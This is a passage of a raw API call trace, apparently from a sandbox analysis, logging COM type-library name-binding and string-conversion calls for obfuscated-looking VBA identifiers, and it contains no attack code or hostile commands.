IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.775] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_iDAc_DAA", lHashVal=0x1067ae, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.775] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.775] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.775] IUnknown:Release (This=0x665ba50) returned 0xd [0069.775] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa87127e, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_iDAc_DAA") returned 16 [0069.775] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_iDAc_DAA", lHashVal=0x1067ae, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x69005f00720061, ppTypeComp=0x5f006300000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x69005f00720061, ppTypeComp=0x5f006300000000, pDummy=0x0) returned 0x0 [0069.775] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b81e9e | out: _Dst=0x144ec0) returned 0x0 [0069.775] ITypeComp:RemoteBind (in: This=0x665ba60, szName="UAxxAw", lHashVal=0x1059ac, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.775] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81eca, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="UAxxAw") returned 7 [0069.775] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="UAxxAw", lHashVal=0x1059ac, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.775] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81eca, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="UAxxAw") returned 7 [0069.775] ITypeComp:RemoteBind (in: This=0x665bd30, szName="UAxxAw", lHashVal=0x1059ac, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.775] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UAxxAw") returned 0x1059ac [0069.775] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="UAxxAw" | out: _Dst="UAxxAw") returned 0x0 [0069.775] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="UAxxAw") returned 7 [0069.775] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.775] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="UAxxAw", lHashVal=0x1059ac, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.775] IUnknown:Release (This=0x665ba50) returned 0xd [0069.775] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.776] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="UAxxAw", lHashVal=0x1059ac, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.776] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.776] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.776] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="UAxxAw", lHashVal=0x1059ac, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.776] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.776] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.776] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="UAxxAw", lHashVal=0x1059ac, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.776] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.776] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81eca, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="UAxxAw") returned 7 [0069.776] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="UAxxAw", lHashVal=0x1059ac, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.776] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.776] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3b81eca | out: _Dst=0x67c2d40) returned 0x0 [0069.776] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_UAxxAw") returned 0x10d455 [0069.776] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_UAxxAw" | out: _Dst="_B_var_UAxxAw") returned 0x0 [0069.776] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_UAxxAw") returned 14 [0069.776] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.776] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_UAxxAw", lHashVal=0x10d455, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.776] IUnknown:Release (This=0x665ba50) returned 0xd [0069.776] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.776] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_UAxxAw", lHashVal=0x10d455, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.776] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.776] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.777] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_UAxxAw", lHashVal=0x10d455, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.777] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.777] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.777] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_UAxxAw", lHashVal=0x10d455, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.777] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.777] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.777] IUnknown:Release (This=0x665ba50) returned 0xd [0069.777] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa8712ae, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_UAxxAw") returned 14 [0069.777] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_UAxxAw", lHashVal=0x10d455, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x55005f00720061, ppTypeComp=0x41007800000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x55005f00720061, ppTypeComp=0x41007800000000, pDummy=0x0) returned 0x0 [0069.777] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b81eca | out: _Dst=0x144ec0) returned 0x0 [0069.777] ITypeComp:RemoteBind (in: This=0x665ba60, szName="aAQUAA", lHashVal=0x101c02, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.777] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81f1a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="aAQUAA") returned 7 [0069.777] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="aAQUAA", lHashVal=0x101c02, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.778] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81f1a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="aAQUAA") returned 7 [0069.778] ITypeComp:RemoteBind (in: This=0x665bd30, szName="aAQUAA", lHashVal=0x101c02, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.778] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="aAQUAA") returned 0x101c02 [0069.778] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="aAQUAA" | out: _Dst="aAQUAA") returned 0x0 [0069.778] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="aAQUAA") returned 7 [0069.778] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.778] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="aAQUAA", lHashVal=0x101c02, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.778] IUnknown:Release (This=0x665ba50) returned 0xd [0069.778] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.778] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="aAQUAA", lHashVal=0x101c02, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.778] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.778] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.778] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="aAQUAA", lHashVal=0x101c02, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.778] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.778] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.778] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="aAQUAA", lHashVal=0x101c02, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.778] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.778] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81f1a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="aAQUAA") returned 7 [0069.778] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="aAQUAA", lHashVal=0x101c02, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.779] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.779] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3b81f1a | out: _Dst=0x67c2d40) returned 0x0 [0069.779] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_aAQUAA") returned 0x1096ab [0069.779] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_aAQUAA" | out: _Dst="_B_var_aAQUAA") returned 0x0 [0069.779] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_aAQUAA") returned 14 [0069.779] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.779] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_aAQUAA", lHashVal=0x1096ab, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.779] IUnknown:Release (This=0x665ba50) returned 0xd [0069.779] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.779] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_aAQUAA", lHashVal=0x1096ab, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.779] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.779] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.779] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_aAQUAA", lHashVal=0x1096ab, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.779] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.779] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.779] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_aAQUAA", lHashVal=0x1096ab, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.779] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.779] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.779] IUnknown:Release (This=0x665ba50) returned 0xd [0069.779] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa8712de, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_aAQUAA") returned 14 [0069.779] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_aAQUAA", lHashVal=0x1096ab, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x61005f00720061, ppTypeComp=0x41005500000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x61005f00720061, ppTypeComp=0x41005500000000, pDummy=0x0) returned 0x0 [0069.779] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b81f1a | out: _Dst=0x144ec0) returned 0x0 [0069.780] ITypeComp:RemoteBind (in: This=0x665ba60, szName="L1U1AAc", lHashVal=0x10d9dc, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.780] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81ef2, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="L1U1AAc") returned 8 [0069.780] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="L1U1AAc", lHashVal=0x10d9dc, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.780] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81ef2, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="L1U1AAc") returned 8 [0069.780] ITypeComp:RemoteBind (in: This=0x665bd30, szName="L1U1AAc", lHashVal=0x10d9dc, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.780] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="L1U1AAc") returned 0x10d9dc [0069.780] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="L1U1AAc" | out: _Dst="L1U1AAc") returned 0x0 [0069.780] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="L1U1AAc") returned 8 [0069.780] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.780] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="L1U1AAc", lHashVal=0x10d9dc, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.780] IUnknown:Release (This=0x665ba50) returned 0xd [0069.780] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.780] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="L1U1AAc", lHashVal=0x10d9dc, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.780] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.780] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.780] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="L1U1AAc", lHashVal=0x10d9dc, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.780] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.780] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.780] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="L1U1AAc", lHashVal=0x10d9dc, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.780] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.780] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81ef2, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="L1U1AAc") returned 8 [0069.780] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="L1U1AAc", lHashVal=0x10d9dc, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.780] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.780] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3b81ef2 | out: _Dst=0x67c2d40) returned 0x0 [0069.781] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_L1U1AAc") returned 0x10dd60 [0069.781] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_L1U1AAc" | out: _Dst="_B_var_L1U1AAc") returned 0x0 [0069.781] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_L1U1AAc") returned 15 [0069.781] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.781] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_L1U1AAc", lHashVal=0x10dd60, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.781] IUnknown:Release (This=0x665ba50) returned 0xd [0069.781] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.781] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_L1U1AAc", lHashVal=0x10dd60, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.781] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.781] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.781] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_L1U1AAc", lHashVal=0x10dd60, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.781] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.781] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.781] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_L1U1AAc", lHashVal=0x10dd60, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.781] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.781] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.781] IUnknown:Release (This=0x665ba50) returned 0xd [0069.781] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa87130e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_L1U1AAc") returned 15 [0069.781] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_L1U1AAc", lHashVal=0x10dd60, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x4c005f00720061, ppTypeComp=0x41003100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x4c005f00720061, ppTypeComp=0x41003100000000, pDummy=0x0) returned 0x0 [0069.781] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b81ef2 | out: _Dst=0x144ec0) returned 0x0 [0069.782] ITypeComp:RemoteBind (in: This=0x665ba60, szName="aACAGB", lHashVal=0x10e2cb, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.782] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81f6a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="aACAGB") returned 7 [0069.782] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="aACAGB", lHashVal=0x10e2cb, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.782] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81f6a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="aACAGB") returned 7 [0069.782] ITypeComp:RemoteBind (in: This=0x665bd30, szName="aACAGB", lHashVal=0x10e2cb, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.782] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="aACAGB") returned 0x10e2cb [0069.782] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="aACAGB" | out: _Dst="aACAGB") returned 0x0 [0069.782] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="aACAGB") returned 7 [0069.782] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.782] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="aACAGB", lHashVal=0x10e2cb, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.782] IUnknown:Release (This=0x665ba50) returned 0xd [0069.782] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.782] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="aACAGB", lHashVal=0x10e2cb, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.782] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.782] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.782] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="aACAGB", lHashVal=0x10e2cb, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.782] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.782] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.782] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="aACAGB", lHashVal=0x10e2cb, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.782] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.782] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81f6a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="aACAGB") returned 7 [0069.782] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="aACAGB", lHashVal=0x10e2cb, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.782] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.782] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3b81f6a | out: 